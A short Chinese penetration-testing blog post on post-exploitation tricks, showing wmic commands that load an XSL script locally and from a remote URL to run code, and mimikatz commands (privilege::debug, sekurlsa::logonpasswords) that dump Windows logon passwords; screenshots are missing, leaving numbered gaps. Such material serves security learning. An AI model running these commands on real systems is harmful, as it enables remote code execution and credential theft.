1. 首页
  2. 渗透测试

wmic与mimikatz技巧

前言

wmic是比cmd强大的命令行。轻量级调试器神器mimikatz,后渗透常用,可以说是您

居家旅行杀人灭口必备良器
1

测试wmic

使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。

本地:
wmic process list /FORMAT:evil.xsl
远程:
wmic os get /FORMAT:"https://example.com/evil.xsl"
  • 本地:

2

privilege::debug
sekurlsa::logonpasswords

3

密码账号

4

  • 远程:

5

OK
6

PowerShell

项目:地址

升级版Demon表哥演示
7

总结

emmmm,多关注墙外的知识。
参考(抄袭):
https://www.secpulse.com/archives/71380.html
https://www.t00ls.net/viewthread.php?tid=45774&extra=&page=1

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论列表(1条)

  • DYBY 2018年6月20日 上午11:48

    这个还不错,值得学习 🙂

联系我们

在线咨询:点击这里给我发消息

QR code